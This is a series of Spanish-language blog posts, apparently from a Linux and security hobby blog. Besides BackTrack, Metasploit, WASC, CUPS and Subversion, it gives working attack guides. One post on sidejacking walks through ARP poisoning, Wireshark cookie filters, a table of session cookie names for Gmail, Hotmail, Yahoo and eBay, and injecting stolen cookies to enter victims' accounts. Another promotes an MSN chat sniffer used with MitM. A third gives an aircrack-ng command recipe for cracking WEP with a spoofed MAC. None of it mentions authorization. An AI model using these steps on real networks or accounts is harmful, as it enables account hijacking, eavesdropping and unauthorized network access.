Pues, algunos ya se abrán percatado de que la distribución Linux orientada a seguridad más famosa cambió de página y que hace más de una semana salió la versión Final de la versión 4 … nos referimos a Backtrack, por supuesto.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Bueno, la nueva página oficial la encontramos en: http://www.backtrack-linux.org/

Y nos podemos bajar la versión 4 de: http://www.backtrack-linux.org/downloads/

En lo personal, apenas en un rato pensaré en bajarme la distro, pues pesa 1570 MB y se va a llevar un rato, mientras terminaré algunas cosas que hacer, supongo

Salu2!

Bueno, en esta entrada aprovecharé para recomendar un curso que a lo mejor ya conocían de Metasploit … el curso de Metasploit Unleashed, el cual es gratuito pero aprovecha para captar donaciones de HFC (Hackers For Charity) para ayudar niños del Este de África (mas de HFC) .

Encontré información muy útil, y pues creo que es el curso más completo de Metasploit que hay (por lo menos gratuito, je, aparte que ni conosco muchos), solo hay algunas consideraciones, la primera es que está en inglés (para los que no les guste el idioma, pues abrá que dedicarle un rato) y la versión en PDF aun no está lista asi que solo lo podemos disfrutar en línea.

I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment.  The MSF is far more than just a collection of exploits, it’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.

Vale muchísimo la pena darle una checada!

La dirección del curso es: http://www.offensive-security.com/metasploit-unleashed/

Bueno, esta mañana revisando el correo me topé con uno muy interesante, creo que viene de una lista de correos … donde anuncian que ha sido liberada la clasificación de amenazas por el Web Application Security Consortium (WASC), donde hacen una clasificación de debilidades y ataques que pueden llevar a comrpometer un sitio, datos o a los usuarios.

Bueno, dejo citado el email que recibí donde viene una explicación un poco más formal y los enlaces a los documentos respectivos, recomiendo bajar el pdf para que tengan la referencia a la mano, la ando checando y me parece muy interesante si queremos tratar asuntos más formales de seguridad:

The Web Application Security Consortium (WASC) is pleased to announce the long awaited release of the WASC
Threat Classification v2.0. The Threat Classification is an effort to classify the weaknesses, and attacks
that can lead to the compromise of a website, its data, or its users. This document’s primarily purpose is
to serve as a reference guide for common attacks and weaknesses.

Main goals
- Refine document scope, terminology, and purpose
- Update existing sections when applicable
- Add missing attacks and weaknesses
- Creation of a firm, scalable base foundation allowing for the introduction of data views allowing for various
forms of data representation
- Addition of attack and weakness reference identifiers (WASC-<xx>)
- Publication of two data views

WASC Threat Classification v2.0 Online
http://projects.webappsec.org/Threat-Classification

Using the Threat Classification
http://projects.webappsec.org/Using-the-Threat-Classification

Threat Classification Authors and Contributors
http://projects.webappsec.org/Threat-Classification-Authors

WASC Threat Classification FAQ
http://projects.webappsec.org/Threat-Classification-FAQ

WASC Reference Identifier Grid
http://projects.webappsec.org/Threat-Classification-Reference-Grid

Threat Classification Data Views
http://projects.webappsec.org/Threat-Classification-Views

Muy recomendado darle una checada

Bueno, navegando por la red, me topé con un proyecto hecho por elJojo, el cual recicla un equipo viejo de cómputo y le da una función muy útil… lo vuelve un reproductor de música casero … todo con software libre!… me animé a postearlo en Apuntux por que se me hace una propuesta interesante y es una buena muestra de lo que se puede hacer con Linux y un poco de creatividad.

Super Chancho System es un sistema de audio que “estructuré” en mi tiempo libre.
Básicamente es un AMD @ 550mhz + 256MB de memoria ram y 40GB de HDD, lo configuré con Ubuntu Server y le puse un entorno gnome para cargar el programa MOC.

La idea de todo esto es hacer un reproductor de música para el living de mi casa, solo prendo el computador y una vez cargado todo, empieza a sonar la música que tiene en el disco duro.

Como Extra, lo configuré para que se pueda controlar todo desde mi celular Sony Ericsson via bluetooth, cosa que no se necesite ni pantalla para que el sistema funcione.

Vale la pena darle una checada

Howto: http://docs.google.com/View?id=dcf88zt3_0qhdmhdfx

Fuente: http://soy.eljojo.net/2009/08/super-chancho-system/

Que tal, dejo esto como apunte personal…para entrar a la interfaz web de CUPS es:

http://localhost:631

¿Qué es CUPS?

CUPS provides a portable printing layer for UNIX®-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces.

CUPS uses the Internet Printing Protocol (“IPP”) as the basis for managing print jobs and queues. The Line Printer Daemon (“LPD”) Server Message Block (“SMB”), and AppSocket (a.k.a. JetDirect) protocols are also supported with reduced functionality. CUPS adds network printer browsing and PostScript Printer Description (“PPD”) based printing options to support real-world printing under UNIX.

Fuente:

http://www.cups.org/articles.php?L274+TFAQ+Q

Alguna vez se emocionaron por realizar demasiados cambios a la vez y acabaron “estropeando” su proyecto… y no solo me refiero a desarrollo de software, ¿Qué tal la tesis?…

A mi me sucedió el año pasado, y fue precisamente mientras buscaba en una serie de carpetas marcadas como “octubre2008″, “noviembre2008″, “diciembre2008″ etc una versión lo más coherente posible de mi tesis… que supe que tenía que aprender a usar alguna herramienta que me permitiera regarla con confianza en mis proyectos… y que cuando decidiera, pudiera retomar alguna idea de versiones anteriores de los archivos, sin arrepentimientos ni sentimientos encontrados.

Subversion nos permite hacer esto y mucho más, en este post les propongo sencillos tips para que puedan configurar su repo en 5 minutos y se ahorren muchos dolores de cabeza .

Subversión viene instalado Mac OS X Leopard y en Debian Linux… si la terminal no reconoce el comando “svn” les recomiendo lo bajen desde la página del autor.

Una de las ventajas que le veo a Subversion frente a Concurrent Version System (CVS), es que solo existe una versión para todo el repositorio, es decir si tengo n archivos en mi repositorio,  hago x número de cambios en el (add, delete, actualizo archivos, etc.) y posteriormente actualizo el repo (mediante el commando commit del cual hablaremos más adelante) la versión del mismo aumentará en 1, es decir:

versióndelrepo++;

No como en CVS donde se mantiene un “contador” por cada archivo y sinceramente se me hace un relajo administrar eso…

Pero bueno, esto tendrá sentido para ustedes una vez que hayan trabajado un rato con Subversion.

Paso 1: Creación del repositorio

Nuestro repo se llamará:

LaTesisImposible

Y lo guardaremos en:

/Users/dario/Documents/subversionRepos

Para esto utilizaremos los siguiente comandos desde la consola:

mkdir /Users/dario/Documents/subversionRepos

svnadmin create /Users/dario/Documents/subversionRepos/LaTesisImposible

Paso 2: Configuración del repositorio (intro):

Listo! si la ruta es válida se generará nuestro repositorio, si le damos un “ls” a la carpeta LaTesisImposible deben de aparecer las siguientes subcarpetas:

README.txt    dav        format        locks
 conf        db        hooks

El README solamente nos notifica que el directorio es un repositorio Subversion, si lo quieren checar denle un:

nano README.txt

La carpeta hooks contiene “scripts” para asegurar que básicamente no la estamos regando… por ejemplo, hay un script llamado pre-commit.tmp donde Subversion checa que siempre que subamos cambios al repo, pongamos un comentario (ahora les explico como hacerlo), y que si el mensaje es NULL, nos mande un error, también comprueba que tenemos permisos para actualizar el repo.

y ahora es cuando entra la importancia de la carpeta conf…

Si checamos los archivos dentro de esa carpeta encontraremos lo siguiente:

moebius1:conf dario$ ls
 authz        passwd        svnserve.conf

Por lo que es obvio que esta carpeta es el “cadenero a la puerta del bar”.

De una vez les paso la liga al libro “oficial” de Subversion, donde se detalla como establecer permisos de lectura/escritura y todo aquello.

Paso 3: Sincronizar nuestra carpeta de proyecto con el repositorio

Tenemos que movernos a donde queremos que se genere nuestra carpeta de trabajo, por ejemplo, les propongo esta ruta:

cd /Users/dario/Documents/Universidad/9noSemestre/

dentro de esta carpeta ejecutamos:

svn co file:///Users/dario/Documents/subversionRepos/LaTesisImposible

Lo que hara que dentro de 9noSemetre se genere una carpeta llamada LaTesisImposible la cual ya está sincronizada con el repo.

Paso 4: Generar archivos en nuestra carpeta de trabajo

Bueno, pues a trabajar!! yo generé 2 archivos:

miTesis.txt

miBibliografia.txt

//(recuerden que a las compus aún no le gustan los acentos en los nombres de archivos)

Obviamente dentro de la carpeta sincronizada (no en el repo).

Paso 5: Añadir archivos al repo.

svn add miTesis.txt miBibliografia.txt (añade solo esos 2 archivos)

ó

svn add *.txt (añade todos los archivos con extensión txt)

ó

svn add *.* (añade todos los archivos)

Paso 6: Subir los cambios en el repo.

svn commit -m "Añadidos los archivos miTesis.txt y miBibliografia.txt, espero acabar antes de Diciembre"

la opción -m nos permite agregar un mensaje al commit, esto es básico para saber en términos generales lo que vamos cambiando de versión a versión, esto nos permitirá controlar más nuestro desarrollo.

si todo salió bien deben de ver lo siguiente en la Terminal:

Adding         miBibliografia.txt

Adding         miTesis.txt

Transmitting file data .

Committed revision 1.

Listo!!

Tips:

Introduzcan en la Terminal:

svn help

para ver todos los argumentos disponibles, junto con el libro de subversion pueden crear scripts muy interesantes!!

Hey!! una recomendación, utilicen estos comandos para hacer archivos, borrar archivos dentro de las carpetas de trabajo porque de otra manera tendrán que hacer todo dos veces, por ejemplo:

Si quiero generar una carpeta que este bajo control de versión en una línea puedo hacer lo siguiente:

svn mkdir subCarpetaDeLaTesisImposible

esto hará dos cosas:

1. Creará la carpeta.
2. La agregará al repo, como si le diera un add.

De otra manera tendría que hacer esto:

mkdir subCarpetaDeLaTesisImposible

svn add subCarpetaDeLaTesisImposible

¡Espero que les haya servido este post como introducción a Subversion!

Probado en: Ubuntu Jaunty (9.04)

Bueno, al probar Ettercap en Ubuntu a lo mejor a más de uno le ha dado problemas… de que cuando quieren iniciar Scan for hosts se cierra la interfaz gráfica o cuando lo corremos en línea de comandos que nos arroja:

Dissector "dns" not supported (etter.conf line 70)
Ooops ! This shouldn't happen...
Segmentation Fault...

Bueno, pues la solución no es tan complicada… bastará con reinstalarlo… pero utilizando los paquetes en “drizzt” publicados por Timothy Redaelli.

Salu2!

Lo vi en: http://ubuntuforums.org/showthread.php?t=1160865

Solución: https://launchpad.net/~timothy-redaelli/+archive/ppa

Sidejacking: Robando sesiones mediante Cookies

Bueno, para el robo de Cookies podríamos utilizar programas como Hamster y Ferret … sin embargo, leyendo un tutorial buenisimo (pongo la fuente al final) me doy cuenta de que como podemos hacer lo mismo simplemente utilizando nuestro navegador Firefox y alguna que otra extensión .

No se considera Hijacking como tal el robo de sesiones mediante Cookies, por que realmente no se secuestra totalmente la sesión, solo obtenemos el permiso para entrar en una sesión, pero el usuario víctima no pierde ningún derecho o acceso. Asi que se trata de Sidejacking.

Bueno, claro que eso es solo para insertar la cookie. Primero tenemos que obtenerla y si estamos en una red switcheada, basta con hacer un Arp Poisoning (ataque MitM explicado con anterioridad en Apuntux) para que el tráfico pase a través de nuestra máquina.

Bueno, definamos conceptos con wikipedia: cookie, sidejacking,  sniffing.

Cookie: Una cookie (pronunciado ['ku.ki]; literalmente galleta) es un fragmento de información que se almacena en el disco duro del visitante de una página web a través de su navegador, a petición del servidor de la página. Esta información puede ser luego recuperada por el servidor en posteriores visitas. En ocasiones también se le llama “huella”.

De esta forma, los usos más frecuentes de las cookies son:
* Llevar el control de usuarios: cuando un usuario introduce su nombre de usuario y contraseña, se almacena una cookie para que no tenga que estar introduciéndolas para cada página del servidor. Sin embargo una cookie no identifica a una persona, sino a una combinación de computador y navegador.
* Conseguir información sobre los hábitos de navegación del usuario, e intentos de spyware, por parte de agencias de publicidad y otros. Esto puede causar problemas de privacidad y es una de las razones por la que las cookies tienen sus detractores.

Sidejacking: In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Sniffing: Un packet sniffer es un programa para monitorizar y analizar el tráfico en una red de computadoras, detectando los cuellos de botella y problemas que existan. También puede ser utilizado para “captar”, lícitamente o no, los datos que son transmitidos en la red.

¿Qué vamos a hacer?

Vamos a sniffear el tráfico esperando obtener (mediante un analizador de tráfico) la cookie de alguna víctima (puede ser de cuando el usuario se conecta a Gmail, Hotmail, etc). Luego ingresaremos esa cookie con el plugin “Add N Edit Cookies” de Firefox, lo podemos bajar de aqui: https://addons.mozilla.org/es-ES/firefox/addon/573

Momento… pero …

¿Que cookie en especial estamos buscando?

Bueno, para descubrir que Cookie es la encargada de nuestra sesión podemos utilizar el Add n Edit Cookies para ver cuales son las cookies que tenemos para un sitio donde hemos guardado nuestra sesión (Gmail, Hotmail, etc). Y de ahí solo queda borrar de una por una y verificar en cual ya no nos deja seguir accediendo a nuestra cuenta, ésa sería la cookie que buscamos. Otra forma de ver las Cookies para un sitio viene siendo en el mismo Firefox > Editar > Preferencias > Privacidad > Mostrar Cookies.

Otra forma es en el navegador, en la barra de direcciones poner: javascript:alert(“Cookies: “+document.cookie)

Ok … del documento que me estoy basando, hay un listado de las cookies específicas para algunos servicios… les dejo la tabla para su análisis:

Windows Live Hotmail (live.com) > RPSTAuth

Gmail (mail.google.com) > GX

Tuenti (tuenti.com) > sid

Myspace (myspace.com) > MYUSERINFO

Yahoo (yahoo.com) > T, Y (* se ocupan las 2)

Ebay (ebay.es) > nonsession, s, cid (se ocupan las 3)

Youtube (youtube.com) > LOGIN_INFO

Mercadolibre (mercadolibre.com.mx) > orghash, orgnickp, orguserid, orguseridp, orgpago (las 5 creo que se ocupan, o hagan pruebas jaja)

*Por confirmar

Como sniffear en Wireshark?

Recomendaciones:

- En Wireshark (corriendolo como root) ir a Capture > Interfaces > eth1 (o la que sea nuestra interfaz) y seleccionamos Options

- Para este caso, podemos dejar el capture filter como: tcp port http

- Corremos la captura de tráfico… y en el filter ponemos lo siguiente: http.cookie , con eso solamente visualizaremos los paquetes que incluyan Cookies

- Si ya sabemos que servicio buscar entonces podemos filtrar asi: http.cookie contains “gmail” u otra consulta podria ser http.cookie contains “mercadolibre”

- Seleccionamos el paquete que creamos nos pueda llevar a la información de la Cookie que necesitamos, haciendo Follow TCP Stream … (checa los POST, los GET /mail, cosas asi )

- Analizamos el Stream y vamos sacando la información de la Cookie que necesitemos, esa información la agregaremos con el Add n Edit Cookies

- En Firefox, vamos a Herramientas > Cookie Editor … damos click en Add y simplemente llenamos los datos con lo que hemos sniffeado, en el caso para Gmail sería algo como:

NAME: GX

CONTENT: Lo que sacamos en el Follow TCP Stream

HOST: mail.google.com (viene en las primeras líneas del Follow TCP Stream)

PATH: /

Si tienes duda de cual es la Cookie de la sesión… pues agrega todas! jajaja… y vas descartando posibilidades o hacemos la prueba de registrarnos en el sitio web del que queramos hacer el Sidejacking y vamos probando con eliminación cual es la Cookie de la sesión.

Salu2!

Fuente:

Capturando Cookies. http://usuarios.lycos.es/detodo1pokaso/descargas/CapturandoCookies_NiLHoP.pdf

Pues, me di a la tarea de buscar un Sniffer para conversaciones de MSN, se que contamos con herramientas como el wireshark o ettercap, pero en particular quería algo fácil de usar que me diera ordenadas las conversaciones sin necesidad de hacer gran magia o movimiento y me topé con IM Sniffer, el cual se me hizo bastante genial… y recordando el ataque de MiTM de entradas del blog anteriores tendremos garantizada la obtención de información en la mayoría de los casos.

Les dejo el resumen de lo que hace el programa, sacado de la página oficial del proyecto:

imsniff is a pcap-based instant messaging sniffer. It captures the IM traffic in the network and is able to log conversations, contact lists, profile information, incoming email notifications, other MSN events, etc. Tested in Linux and Windows.

Lo bajamos, descomprimimos, corremos el build y luego el programa y a jugar.

Pruebenlo!

http://sourceforge.net/projects/im-snif/

Bueno, realmente es uno de los temas más comunes el como “crackear” redes inalámbricas que manejan de cifrado WEP y hoy gracias a los avances (de desarrollo de software y hardware… más el trabajo de la comunidad involucrada) es un método realmente sencillo que no toma mucho tiempo. Sencillo? realmente, la utilización de las herramientas es sencilla, pero no significa que la base teórica lo sea. En fin, solo quiero comentar lo que se necesita de forma “genérica” para “crackear” una red inalámbrica.

Digo de forma genérica, por que hay mucha gente que a lo mejor no conoce backtrack, o wifislax … de hecho en lo personal yo prefiero tener en mi computadora los programas que necesito, la distribución Linux que manejo en mi computadora portátil es Ubuntu y en la de escritorio es Debian. Prefiero tener instalados en mi sistema operativo base los programas a estar utilizando Live-Cds aunque de hecho… me gusta basarme de ellos para saber que herramientas son interesantes, en fin.

En Ubuntu, creo que los programas están en los repositorios asi que no hay mucho lio.

La formula genérica es:

- Tener la suite de herramientas de aircrack-ng : http://www.aircrack-ng.org

- Tener el macchanger

- Que la tarjeta soporte la inyección de paquetes y el modo monitor.

De ahí en más, los pasos a manera de receta son:

# airmon-ng

# airmon-ng stop wlan0

# ifconfig wlan0 down

# macchanger –mac 00:11:22:33:44:55 wlan0

# airmon-ng start wlan0

# airodump-ng wlan0

Apretamos para detener push ctrl+c

• Copiamos el BSSID de la red que queramos crackear

# airodump-ng -c (numero del canal) -w wep123 –bssid (bssid) wlan0

- mientras pwr sea mas grande, mejor

- el #Data debe ser alrededor de 10mil, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20mil y al hacerlo ejecutar…

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Nota: El cap file esta en la carpeta home, puse wep123-01.cap pensando en que fue el primer intento.

Listo! sin tantas complicaciones.

Fuentes:

http://richieblog.wordpress.com/2008/07/31/crackear-una-wep-con-backtrack-3-tan-facil-poner-en-jaque-a-la-inalambrica/